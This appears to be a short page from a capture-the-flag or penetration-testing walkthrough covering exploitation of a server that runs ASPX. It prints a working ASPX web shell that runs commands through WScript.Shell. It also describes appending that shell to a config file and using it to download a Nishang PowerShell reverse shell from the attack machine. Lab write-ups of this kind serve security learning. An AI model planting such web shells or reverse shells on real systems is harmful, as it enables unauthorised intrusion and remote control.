Exploitation

Based on the information from before, we know that we can execute aspx. This was done through math which proves itself from the loaded page from before Lets upload a shell.

Executing Commands via created script

Create a file called web.aspx with the following code. 

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("")
o = cmd.StdOut.Readall()
Response.write(o)
%>

Next add that code to the end of the config file we created earlier

Set up a icmp listenin on our attack machine to see if there is communication between the server and us.

The server is communicating with us. That is good news.

Establishing Reverse Shell

LogoGitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.GitHub

At the bottom of the shell.ps1 script set up your listener with the following code.

Modified config file that will download our shell. This creates and object instance of a Windows shell. Then we use this instance to invoke Powershell in order to download the Powershell TCP shell from our exploit machine.

Established connection

PreviousScanning and EnumerationNextPost Exploitation

Last updated

Was this helpful?